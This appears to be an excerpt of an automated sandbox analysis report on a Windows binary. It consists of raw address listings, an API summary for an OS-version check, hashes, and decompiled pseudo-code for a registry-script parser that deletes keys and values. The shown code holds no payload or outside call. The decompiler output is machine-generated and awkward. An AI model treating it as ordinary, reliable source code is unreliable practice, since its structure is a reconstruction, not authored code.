                                                                                                                                                                                          0x00c8f598
                                                                                                                                                                                          0x00c8f59c
                                                                                                                                                                                          0x00c8f5a2
                                                                                                                                                                                          0x00c8f5ac
                                                                                                                                                                                          0x00c8f5b8
                                                                                                                                                                                          0x00c8f5f4
                                                                                                                                                                                          0x00c8f601
                                                                                                                                                                                          0x00c8f605
                                                                                                                                                                                          0x00c8f60c
                                                                                                                                                                                          0x00c8f60c
                                                                                                                                                                                          0x00c8f617
                                                                                                                                                                                          0x00c8f61e
                                                                                                                                                                                          0x00c8f622
                                                                                                                                                                                          0x00c8f628
                                                                                                                                                                                          0x00c8f62a
                                                                                                                                                                                          0x00c8f637
                                                                                                                                                                                          0x00c8f637
                                                                                                                                                                                          0x00c8f639
                                                                                                                                                                                          0x00c8f639
                                                                                                                                                                                          0x00c8f64b
                                                                                                                                                                                          0x00c8f653
                                                                                                                                                                                          0x00c8f658
                                                                                                                                                                                          0x00c8f65b
                                                                                                                                                                                          0x00c8f669
                                                                                                                                                                                          0x00c8f6bb
                                                                                                                                                                                          0x00c8f6bf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8f66b
                                                                                                                                                                                          0x00c8f66b
                                                                                                                                                                                          0x00c8f679
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8f67b
                                                                                                                                                                                          0x00c8f681
                                                                                                                                                                                          0x00c8f684
                                                                                                                                                                                          0x00c8f687
                                                                                                                                                                                          0x00c8f68a
                                                                                                                                                                                          0x00c8f68f
                                                                                                                                                                                          0x00c8f6ae
                                                                                                                                                                                          0x00c8f6b2
                                                                                                                                                                                          0x00c8f691
                                                                                                                                                                                          0x00c8f691
                                                                                                                                                                                          0x00c8f698
                                                                                                                                                                                          0x00c8f6a2
                                                                                                                                                                                          0x00c8f6a5
                                                                                                                                                                                          0x00c8f6a5
                                                                                                                                                                                          0x00c8f6c6
                                                                                                                                                                                          0x00c8f6e2
                                                                                                                                                                                          0x00c8f6e2
                                                                                                                                                                                          0x00c8f669
                                                                                                                                                                                          0x00c8f5c9
                                                                                                                                                                                          0x00c8f5cb
                                                                                                                                                                                          0x00c8f5d5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8f5d7
                                                                                                                                                                                          0x00c8f5db
                                                                                                                                                                                          0x00c8f5e2
                                                                                                                                                                                          0x00c8f5e7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8F57E
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8F593
                                                                                                                                                                                          • GetVersionExW.KERNEL32(?,?,00000000,0000011C,00000000,?), ref: 00C8F5A2
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00C8F5C4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00C8F5C7
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 00C8F5DC
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll,RtlGetVersion), ref: 00C8F5FE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00C8F601
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8F653
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$AddressHandleModuleProc$CurrentProcessVersion
                                                                                                                                                                                          • String ID: IsWow64Process$RtlGetVersion$kernel32$ntdll
                                                                                                                                                                                          • API String ID: 3825021448-1059190566
                                                                                                                                                                                          • Opcode ID: 613365f38525df396663797177e5a5a2b4ce402426170118b3b6c2fe6f3adc72
                                                                                                                                                                                          • Instruction ID: 7dcda00a1e41e049ca0e32925fb91f1abb0d03494ad8126217385f2cb6d09f58
                                                                                                                                                                                          • Opcode Fuzzy Hash: 613365f38525df396663797177e5a5a2b4ce402426170118b3b6c2fe6f3adc72
                                                                                                                                                                                          • Instruction Fuzzy Hash: 76418F716043019FD710EF68C841BAABBE5EF84308F45892DF948DB291EB71D906CBA6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9A3E1 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 415stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                          			E00C9A3E1(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t115;
				short _t116;
				long _t120;
				long _t122;
				signed int _t124;
				signed int _t127;
				long _t129;
				long _t135;
				signed int _t137;
				long _t140;
				long _t141;
				int _t144;
				long _t147;
				long _t149;
				int _t153;
				long _t167;
				long _t175;
				long _t177;
				void* _t186;
				long _t189;
				long _t190;
				signed int _t191;
				void* _t210;
				void* _t242;
				WCHAR* _t244;
				void* _t245;
				long _t247;
				void* _t248;
				long _t251;
				short* _t253;
				void* _t255;
				void* _t256;
				void* _t259;

				_t242 = __edx;
				_t253 = _t255 - 0x220c;
				E00D00E90(0x220c);
				_push(0xffffffff);
				_push(0xd2ff43);
				_push( *[fs:0x0]);
				_t256 = _t255 - 0x3c;
				_t115 =  *0xd64070; // 0x8a9e1774
				_t116 = _t115 ^ _t253;
				_t253[0x1104] = _t116;
				_push(_t116);
				 *[fs:0x0] = _t253 - 0xc;
				_t244 = _t253[0x110a];
				_t185 = 0;
				 *((intOrPtr*)(_t253 - 0x10)) = __ecx;
				 *(_t253 - 0x14) = _t253[0x110c];
				 *((intOrPtr*)(_t253 - 0x1c)) = 0;
				 *((intOrPtr*)(_t253 - 0x18)) = 0;
				 *((intOrPtr*)(_t253 - 4)) = 0;
				 *(_t253 - 0x44) = _t253[0x1110];
				_t120 = E00C98D7E(__ecx, 0, _t244);
				while(1) {
					L1:
					_t247 = _t120;
					_t259 = _t247 - _t185;
					L71:
					while(_t259 >= 0) {
						while( *_t244 != 0x7d) {
							 *(_t253 - 0x28) = 1;
							_t124 = lstrcmpiW(_t244, L"Delete");
							asm("sbb ebx, ebx");
							_t189 =  ~_t124 + 1;
							__eflags = lstrcmpiW(_t244, L"ForceRemove");
							if(__eflags == 0) {
								L4:
								_t247 = E00C98D7E( *((intOrPtr*)(_t253 - 0x10)), __eflags, _t244);
								__eflags = _t247;
								if(_t247 < 0) {
									goto L84;
								}
								__eflags = _t253[0x110e];
								if(_t253[0x110e] == 0) {
									L15:
									_t127 = lstrcmpiW(_t244, L"NoRemove");
									__eflags = _t127;
									if(__eflags != 0) {
										L17:
										__eflags = lstrcmpiW(_t244, L"Val");
										if(__eflags != 0) {
											_t129 = E00C98CFF(_t244, 0x5c);
											__eflags = _t129;
											if(_t129 != 0) {
												L75:
												_t247 = 0x80020009;
												goto L84;
											}
											__eflags = _t253[0x110e] - _t129;
											if(_t253[0x110e] == _t129) {
												__eflags = _t253[0x1110];
												if(_t253[0x1110] != 0) {
													_t190 = 2;
												} else {
													_t190 = E00C98A10(_t253 - 0x1c,  *(_t253 - 0x14), _t244, 0x20019);
												}
												__eflags = _t190;
												if(_t190 != 0) {
													_t253[0x1110] = 1;
												}
												E00C8DAA0(E00D01877(_t242,  &(_t253[0x1000]), 0x104, _t244, 0xffffffff));
												_t256 = _t256 + 0x14;
												_t247 = E00C98D7E( *((intOrPtr*)(_t253 - 0x10)), __eflags, _t244);
												__eflags = _t247;
												if(_t247 < 0) {
													goto L84;
												} else {
													_t247 = E00C98EED(_t190,  *((intOrPtr*)(_t253 - 0x10)), _t242, _t244);
													__eflags = _t247;
													if(_t247 < 0) {
														goto L84;
													}
													__eflags =  *_t244 - 0x7b;
													if( *_t244 != 0x7b) {
														L51:
														_t135 =  *(_t253 - 0x44);
														_t253[0x1110] = _t135;
														__eflags = _t190 - 2;
														if(_t190 == 2) {
															continue;
														}
														__eflags = _t190;
														if(_t190 == 0) {
															__eflags = _t135;
															if(_t135 == 0) {
																L60:
																 *((intOrPtr*)(_t253 - 0x48)) = E00C98EB8( *((intOrPtr*)(_t253 - 0x10)),  *((intOrPtr*)(_t253 - 0x1c)));
																_t137 = E00C92620(_t253 - 0x1c);
																_t191 = _t137;
																__eflags = _t191;
																if(_t191 != 0) {
																	E00C92620(_t253 - 0x1c);
																	_push(_t191);
																	L79:
																	_t122 = E00C988C8();
																	L85:
																	 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
																	_pop(_t245);
																	_pop(_t248);
																	_pop(_t186);
																	return E00D0071A(_t122, _t186, _t253[0x1104] ^ _t253, _t242, _t245, _t248);
																}
																__eflags =  *(_t253 - 0x28) - _t137;
																if( *(_t253 - 0x28) == _t137) {
																	continue;
																}
																__eflags =  *((intOrPtr*)(_t253 - 0x48)) - _t137;
																if( *((intOrPtr*)(_t253 - 0x48)) != _t137) {
																	continue;
																}
																_t140 = RegDeleteKeyW( *(_t253 - 0x14),  &(_t253[0x1000]));
																 *(_t253 - 0x40) =  *(_t253 - 0x40) & _t191;
																 *(_t253 - 0x3c) =  *(_t253 - 0x3c) & _t191;
																__eflags = _t140;
																if(_t140 != 0) {
																	_t141 = E00C988C8(_t140);
																	_t210 = _t253 - 0x40;
																	L82:
																	_t247 = _t141;
																	L83:
																	E00C92620(_t210);
																	goto L84;
																}
																_t210 = _t253 - 0x40;
																L65:
																E00C92620(_t210);
																L66:
																__eflags = _t253[0x110e];
																if(_t253[0x110e] == 0) {
																	continue;
																}
																__eflags =  *_t244 - 0x7b;
																if( *_t244 != 0x7b) {
																	continue;
																}
																_t144 = lstrlenW(_t244);
																__eflags = _t144 - 1;
																if(_t144 != 1) {
																	continue;
																}
																_t247 = E00C9A3E1( *((intOrPtr*)(_t253 - 0x10)), _t242, _t244,  *((intOrPtr*)(_t253 - 0x1c)), _t253[0x110e], 0);
																__eflags = _t247;
																if(__eflags < 0) {
																	goto L84;
																}
																_t247 = E00C98D7E( *((intOrPtr*)(_t253 - 0x10)), __eflags, _t244);
																__eflags = _t247;
																goto L71;
															}
															_t147 = E00C98EB8( *((intOrPtr*)(_t253 - 0x10)),  *((intOrPtr*)(_t253 - 0x1c)));
															__eflags = _t147;
															if(_t147 == 0) {
																goto L60;
															}
															_t149 = E00C98E8C( &(_t253[0x1000]));
															__eflags = _t149;
															if(_t149 != 0) {
																__eflags =  *(_t253 - 0x28);
																if( *(_t253 - 0x28) != 0) {
																	_push( &(_t253[0x1000]));
																	E00C99147(_t253 - 0x1c, _t242);
																}
															}
															continue;
														}
														__eflags = _t135;
														if(_t135 != 0) {
															continue;
														}
														_t247 = E00C988C8(_t190);
														goto L84;
													}
													_t153 = lstrlenW(_t244);
													__eflags = _t153 - 1;
													if(_t153 != 1) {
														goto L51;
													}
													_t247 = E00C9A3E1( *((intOrPtr*)(_t253 - 0x10)), _t242, _t244,  *((intOrPtr*)(_t253 - 0x1c)), 0, _t253[0x1110]);
													__eflags = _t247;
													if(__eflags >= 0) {
														L50:
														_t247 = E00C98D7E( *((intOrPtr*)(_t253 - 0x10)), __eflags, _t244);
														__eflags = _t247;
														if(_t247 < 0) {
															goto L84;
														}
														goto L51;
													}
													__eflags = _t253[0x1110];
													if(__eflags == 0) {
														goto L84;
													}
													goto L50;
												}
											}
											__eflags = E00C98A10(_t253 - 0x1c,  *(_t253 - 0x14), _t244, 0x2001f);
											if(__eflags == 0) {
												L36:
												_t247 = E00C98D7E( *((intOrPtr*)(_t253 - 0x10)), __eflags, _t244);
												__eflags = _t247;
												if(_t247 < 0) {
													goto L84;
												}
												__eflags =  *_t244 - 0x3d;
												if(__eflags != 0) {
													goto L66;
												}
												_push(_t244);
												_push(0);
												_push(_t253 - 0x1c);
												_t247 = E00C9A0FD( *((intOrPtr*)(_t253 - 0x10)), _t242, __eflags);
												L12:
												__eflags = _t247;
												if(_t247 < 0) {
													goto L84;
												}
												goto L66;
											}
											__eflags = E00C98A10(_t253 - 0x1c,  *(_t253 - 0x14), _t244, 0x20019);
											if(__eflags == 0) {
												goto L36;
											}
											_t251 = E00C989C2(_t253 - 0x1c,  *(_t253 - 0x14), _t244, 0, 0, 0x2001f, 0, 0);
											__eflags = _t251;
											if(__eflags != 0) {
												E00C92620(_t253 - 0x1c);
												_push(_t251);
												goto L79;
											}
											goto L36;
										}
										_t247 = E00C98D7E( *((intOrPtr*)(_t253 - 0x10)), __eflags, _t253);
										_t185 = 0;
										__eflags = _t247;
										if(__eflags < 0) {
											goto L84;
										}
										_t247 = E00C98D7E( *((intOrPtr*)(_t253 - 0x10)), __eflags, _t244);
										__eflags = _t247;
										if(_t247 < 0) {
											goto L84;
										}
										__eflags =  *_t244 - 0x3d;
										if( *_t244 != 0x3d) {
											goto L75;
										}
										__eflags = _t253[0x110e];
										if(__eflags == 0) {
											__eflags = _t253[0x1110];
											if(_t253[0x1110] != 0) {
												L30:
												_t120 = E00C98EED(_t185,  *((intOrPtr*)(_t253 - 0x10)), _t242, _t244);
												goto L1;
											}
											__eflags =  *(_t253 - 0x28);
											if( *(_t253 - 0x28) == 0) {
												goto L30;
											}
											 *(_t253 - 0x30) = 0;
											 *((intOrPtr*)(_t253 - 0x2c)) = 0;
											_t167 = E00C98A10(_t253 - 0x30,  *(_t253 - 0x14), 0, 0x20006);
											__eflags = _t167;
											if(_t167 != 0) {
												L77:
												_t141 = E00C988C8(_t167);
												_t210 = _t253 - 0x30;
												goto L82;
											}
											_t167 = RegDeleteValueW( *(_t253 - 0x30), _t253);
											__eflags = _t167;
											if(_t167 == 0) {
												L29:
												E00C92620(_t253 - 0x30);
												goto L30;
											}
											__eflags = _t167 - 2;
											if(_t167 != 2) {
												goto L77;
											}
											goto L29;
										}
										 *(_t253 - 0x38) =  *(_t253 - 0x14);
										_push(_t244);
										_push(_t253);
										_push(_t253 - 0x38);
										 *((char*)(_t253 - 4)) = 1;
										 *((intOrPtr*)(_t253 - 0x34)) = 0;
										_t247 = E00C9A0FD( *((intOrPtr*)(_t253 - 0x10)), _t242, __eflags);
										__eflags = _t247;
										 *(_t253 - 0x38) = 0;
										 *((intOrPtr*)(_t253 - 0x34)) = 0;
										_t210 = _t253 - 0x38;
										if(_t247 < 0) {
											goto L83;
										}
										 *((char*)(_t253 - 4)) = 0;
										goto L65;
									}
									 *(_t253 - 0x28) =  *(_t253 - 0x28) & _t127;
									_t247 = E00C98D7E( *((intOrPtr*)(_t253 - 0x10)), __eflags, _t244);
									__eflags = _t247;
									if(_t247 < 0) {
										goto L84;
									}
									goto L17;
								}
								 *(_t253 - 0x24) = 0;
								 *((intOrPtr*)(_t253 - 0x20)) = 0;
								_t175 = E00C98CFF(_t244, 0x5c);
								__eflags = _t175;
								if(_t175 != 0) {
									E00C92620(_t253 - 0x24);
									goto L75;
								}
								_t177 = E00C98E8C(_t244);
								__eflags = _t177;
								if(_t177 != 0) {
									_push(_t244);
									 *(_t253 - 0x24) =  *(_t253 - 0x14);
									 *((intOrPtr*)(_t253 - 0x20)) = 0;
									E00C99147(_t253 - 0x24, _t242);
									 *(_t253 - 0x24) = 0;
									 *((intOrPtr*)(_t253 - 0x20)) = 0;
								}
								__eflags = _t189;
								if(__eflags == 0) {
									E00C92620(_t253 - 0x24);
									goto L15;
								}
								_t247 = E00C98D7E( *((intOrPtr*)(_t253 - 0x10)), __eflags, _t244);
								__eflags = _t247;
								if(_t247 < 0) {
									_t210 = _t253 - 0x24;
									goto L83;
								}
								_t247 = E00C98EED(_t189,  *((intOrPtr*)(_t253 - 0x10)), _t242, _t244);
								E00C92620(_t253 - 0x24);
								goto L12;
							}
							__eflags = _t189;
							if(__eflags == 0) {
								goto L15;
							}
							goto L4;
						}
						break;
					}
					L84:
					E00C92620(_t253 - 0x1c);
					_t122 = _t247;
					goto L85;
				}
			}







































                                                                                                                                                                                          0x00c9a3e1
                                                                                                                                                                                          0x00c9a3e2
                                                                                                                                                                                          0x00c9a3ee
                                                                                                                                                                                          0x00c9a3f3
                                                                                                                                                                                          0x00c9a3f5
                                                                                                                                                                                          0x00c9a400
                                                                                                                                                                                          0x00c9a401
                                                                                                                                                                                          0x00c9a404
                                                                                                                                                                                          0x00c9a409
                                                                                                                                                                                          0x00c9a40b
                                                                                                                                                                                          0x00c9a414
                                                                                                                                                                                          0x00c9a418
                                                                                                                                                                                          0x00c9a424
                                                                                                                                                                                          0x00c9a42a
                                                                                                                                                                                          0x00c9a42c
                                                                                                                                                                                          0x00c9a42f
                                                                                                                                                                                          0x00c9a432
                                                                                                                                                                                          0x00c9a435
                                                                                                                                                                                          0x00c9a43f
                                                                                                                                                                                          0x00c9a442
                                                                                                                                                                                          0x00c9a445
                                                                                                                                                                                          0x00c9a44a
                                                                                                                                                                                          0x00c9a44a
                                                                                                                                                                                          0x00c9a44a
                                                                                                                                                                                          0x00c9a44c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a882
                                                                                                                                                                                          0x00c9a884
                                                                                                                                                                                          0x00c9a45f
                                                                                                                                                                                          0x00c9a466
                                                                                                                                                                                          0x00c9a471
                                                                                                                                                                                          0x00c9a474
                                                                                                                                                                                          0x00c9a477
                                                                                                                                                                                          0x00c9a479
                                                                                                                                                                                          0x00c9a483
                                                                                                                                                                                          0x00c9a48c
                                                                                                                                                                                          0x00c9a48e
                                                                                                                                                                                          0x00c9a490
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a496
                                                                                                                                                                                          0x00c9a49d
                                                                                                                                                                                          0x00c9a51d
                                                                                                                                                                                          0x00c9a523
                                                                                                                                                                                          0x00c9a529
                                                                                                                                                                                          0x00c9a52b
                                                                                                                                                                                          0x00c9a543
                                                                                                                                                                                          0x00c9a54f
                                                                                                                                                                                          0x00c9a551
                                                                                                                                                                                          0x00c9a62c
                                                                                                                                                                                          0x00c9a633
                                                                                                                                                                                          0x00c9a635
                                                                                                                                                                                          0x00c9a898
                                                                                                                                                                                          0x00c9a898
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a898
                                                                                                                                                                                          0x00c9a63b
                                                                                                                                                                                          0x00c9a641
                                                                                                                                                                                          0x00c9a6be
                                                                                                                                                                                          0x00c9a6c5
                                                                                                                                                                                          0x00c9a6de
                                                                                                                                                                                          0x00c9a6c7
                                                                                                                                                                                          0x00c9a6d8
                                                                                                                                                                                          0x00c9a6d8
                                                                                                                                                                                          0x00c9a6df
                                                                                                                                                                                          0x00c9a6e1
                                                                                                                                                                                          0x00c9a6e3
                                                                                                                                                                                          0x00c9a6e3
                                                                                                                                                                                          0x00c9a702
                                                                                                                                                                                          0x00c9a70a
                                                                                                                                                                                          0x00c9a713
                                                                                                                                                                                          0x00c9a715
                                                                                                                                                                                          0x00c9a717
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a71d
                                                                                                                                                                                          0x00c9a726
                                                                                                                                                                                          0x00c9a728
                                                                                                                                                                                          0x00c9a72a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a730
                                                                                                                                                                                          0x00c9a734
                                                                                                                                                                                          0x00c9a77c
                                                                                                                                                                                          0x00c9a77c
                                                                                                                                                                                          0x00c9a77f
                                                                                                                                                                                          0x00c9a785
                                                                                                                                                                                          0x00c9a788
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a78e
                                                                                                                                                                                          0x00c9a790
                                                                                                                                                                                          0x00c9a7a8
                                                                                                                                                                                          0x00c9a7aa
                                                                                                                                                                                          0x00c9a7f0
                                                                                                                                                                                          0x00c9a7fe
                                                                                                                                                                                          0x00c9a801
                                                                                                                                                                                          0x00c9a806
                                                                                                                                                                                          0x00c9a808
                                                                                                                                                                                          0x00c9a80a
                                                                                                                                                                                          0x00c9a8c4
                                                                                                                                                                                          0x00c9a8c9
                                                                                                                                                                                          0x00c9a8b9
                                                                                                                                                                                          0x00c9a8b9
                                                                                                                                                                                          0x00c9a8e7
                                                                                                                                                                                          0x00c9a8ea
                                                                                                                                                                                          0x00c9a8f2
                                                                                                                                                                                          0x00c9a8f3
                                                                                                                                                                                          0x00c9a8f4
                                                                                                                                                                                          0x00c9a909
                                                                                                                                                                                          0x00c9a909
                                                                                                                                                                                          0x00c9a810
                                                                                                                                                                                          0x00c9a813
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a815
                                                                                                                                                                                          0x00c9a818
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a824
                                                                                                                                                                                          0x00c9a82a
                                                                                                                                                                                          0x00c9a82d
                                                                                                                                                                                          0x00c9a830
                                                                                                                                                                                          0x00c9a832
                                                                                                                                                                                          0x00c9a8cd
                                                                                                                                                                                          0x00c9a8d3
                                                                                                                                                                                          0x00c9a8d6
                                                                                                                                                                                          0x00c9a8d6
                                                                                                                                                                                          0x00c9a8d8
                                                                                                                                                                                          0x00c9a8d8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a8d8
                                                                                                                                                                                          0x00c9a838
                                                                                                                                                                                          0x00c9a83b
                                                                                                                                                                                          0x00c9a83b
                                                                                                                                                                                          0x00c9a840
                                                                                                                                                                                          0x00c9a840
                                                                                                                                                                                          0x00c9a847
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a849
                                                                                                                                                                                          0x00c9a84d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a850
                                                                                                                                                                                          0x00c9a856
                                                                                                                                                                                          0x00c9a859
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a86f
                                                                                                                                                                                          0x00c9a871
                                                                                                                                                                                          0x00c9a873
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a87e
                                                                                                                                                                                          0x00c9a880
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a880
                                                                                                                                                                                          0x00c9a7b2
                                                                                                                                                                                          0x00c9a7b7
                                                                                                                                                                                          0x00c9a7b9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a7c5
                                                                                                                                                                                          0x00c9a7ca
                                                                                                                                                                                          0x00c9a7cc
                                                                                                                                                                                          0x00c9a7d2
                                                                                                                                                                                          0x00c9a7d6
                                                                                                                                                                                          0x00c9a7e2
                                                                                                                                                                                          0x00c9a7e6
                                                                                                                                                                                          0x00c9a7e6
                                                                                                                                                                                          0x00c9a7d6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a7cc
                                                                                                                                                                                          0x00c9a792
                                                                                                                                                                                          0x00c9a794
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a7a1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a7a1
                                                                                                                                                                                          0x00c9a737
                                                                                                                                                                                          0x00c9a73d
                                                                                                                                                                                          0x00c9a740
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a756
                                                                                                                                                                                          0x00c9a758
                                                                                                                                                                                          0x00c9a75a
                                                                                                                                                                                          0x00c9a769
                                                                                                                                                                                          0x00c9a772
                                                                                                                                                                                          0x00c9a774
                                                                                                                                                                                          0x00c9a776
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a776
                                                                                                                                                                                          0x00c9a75c
                                                                                                                                                                                          0x00c9a763
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a763
                                                                                                                                                                                          0x00c9a717
                                                                                                                                                                                          0x00c9a655
                                                                                                                                                                                          0x00c9a657
                                                                                                                                                                                          0x00c9a68b
                                                                                                                                                                                          0x00c9a694
                                                                                                                                                                                          0x00c9a696
                                                                                                                                                                                          0x00c9a698
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a69e
                                                                                                                                                                                          0x00c9a6a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a6ab
                                                                                                                                                                                          0x00c9a6ac
                                                                                                                                                                                          0x00c9a6b1
                                                                                                                                                                                          0x00c9a6b7
                                                                                                                                                                                          0x00c9a508
                                                                                                                                                                                          0x00c9a508
                                                                                                                                                                                          0x00c9a50a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a510
                                                                                                                                                                                          0x00c9a66a
                                                                                                                                                                                          0x00c9a66c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a681
                                                                                                                                                                                          0x00c9a683
                                                                                                                                                                                          0x00c9a685
                                                                                                                                                                                          0x00c9a8b3
                                                                                                                                                                                          0x00c9a8b8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a8b8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a685
                                                                                                                                                                                          0x00c9a563
                                                                                                                                                                                          0x00c9a565
                                                                                                                                                                                          0x00c9a567
                                                                                                                                                                                          0x00c9a569
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a578
                                                                                                                                                                                          0x00c9a57a
                                                                                                                                                                                          0x00c9a57c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a582
                                                                                                                                                                                          0x00c9a586
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a58c
                                                                                                                                                                                          0x00c9a592
                                                                                                                                                                                          0x00c9a5cd
                                                                                                                                                                                          0x00c9a5d3
                                                                                                                                                                                          0x00c9a61b
                                                                                                                                                                                          0x00c9a61f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a61f
                                                                                                                                                                                          0x00c9a5d5
                                                                                                                                                                                          0x00c9a5d8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a5e6
                                                                                                                                                                                          0x00c9a5e9
                                                                                                                                                                                          0x00c9a5ec
                                                                                                                                                                                          0x00c9a5f1
                                                                                                                                                                                          0x00c9a5f3
                                                                                                                                                                                          0x00c9a8a4
                                                                                                                                                                                          0x00c9a8a5
                                                                                                                                                                                          0x00c9a8ab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a8ab
                                                                                                                                                                                          0x00c9a600
                                                                                                                                                                                          0x00c9a606
                                                                                                                                                                                          0x00c9a608
                                                                                                                                                                                          0x00c9a613
                                                                                                                                                                                          0x00c9a616
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a616
                                                                                                                                                                                          0x00c9a60a
                                                                                                                                                                                          0x00c9a60d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a60d
                                                                                                                                                                                          0x00c9a59a
                                                                                                                                                                                          0x00c9a59d
                                                                                                                                                                                          0x00c9a5a1
                                                                                                                                                                                          0x00c9a5a5
                                                                                                                                                                                          0x00c9a5a6
                                                                                                                                                                                          0x00c9a5aa
                                                                                                                                                                                          0x00c9a5b2
                                                                                                                                                                                          0x00c9a5b4
                                                                                                                                                                                          0x00c9a5b6
                                                                                                                                                                                          0x00c9a5b9
                                                                                                                                                                                          0x00c9a5bc
                                                                                                                                                                                          0x00c9a5bf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a5c5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a5c5
                                                                                                                                                                                          0x00c9a530
                                                                                                                                                                                          0x00c9a539
